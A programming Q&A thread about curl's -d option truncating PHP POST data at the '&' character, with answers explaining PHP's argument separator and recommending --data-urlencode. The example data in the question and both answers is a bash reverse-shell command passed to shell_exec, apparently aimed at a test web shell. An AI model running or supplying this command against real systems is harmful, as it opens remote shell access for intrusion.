# curl -d option truncate data with & symbol

Tags: php, curl

I was testing by sending some data using `curl -d` and retrieve the data in a PHP script using `$_POST['data']`,

My request is like

```
curl https://localhost/shell.php -d "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
```

And the `shell.php` script is like:

```
var_dump($_POST['data']);
```

However, the output is truncated, I am only able to get:

```
shell_exec(\"/bin/bash -c '/bin/bash -i >
```

from `$_POST['data']`.

Answer (score 0):

Can you try and escape \&
Like curl https://localhost/shell.php -d "data=shell_exec("/bin/bash -c '/bin/bash -i >\& /dev/tcp/192.168.0.1/8888 0>&1 ' ");"
?

Answer (score 0):

## The Cause

After doing some research, i think i find the root cause of this problem.

First, we have to understand some basic workflow of PHP runtime. When a http request is sent to fast-cgi, the workflow looks like below:

- Some preprocess(i didn't research too much in this step)
- Post request processed vim a bunch module:

  - [cgi_main](https://github.com/php/php-src/blob/master/sapi/cgi/cgi_main.c#L2422)
  - [SAPI](https://github.com/php/php-src/blob/master/main/SAPI.c)
  - Some other code
  - [PHP String Process](https://github.com/php/php-src/blob/master/ext/standard/string.c)

We can also find that there is a page about PHP [default configuration](https://www.php.net/manual/en/ini.core.php) and we can figure out that `&` is the default arg separator for input parameter.

According to all the information we have so far, we can conclude PHP runtime will receive the post data sent by curl and parse it automatically and during the process it will split parameter string based on the default separator.

In my case, if i sent the post request with `-d`, the `&` was not encoded and thus the data will be truncated by PHP at the first occurrence of `&`, which cause the following command to be abandoned.

## The Solution

Use `--data-url-encode` instead of `-d`

```
curl https://localhost/shell.php --data-urlencode "data=shell_exec(\"/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.0.1/8888 0>&1 ' \");"
```

### Note

Some times we see something like `PG`, `SG` and `EG`. They are `PHP common macros` from:

- [PHP](https://github.com/php/php-src/blob/master/main/php_globals.h)
- [ZEND](https://github.com/php/php-src/blob/master/Zend/zend_globals_macros.h)
- [SAPI](https://github.com/php/php-src/blob/master/main/SAPI.h)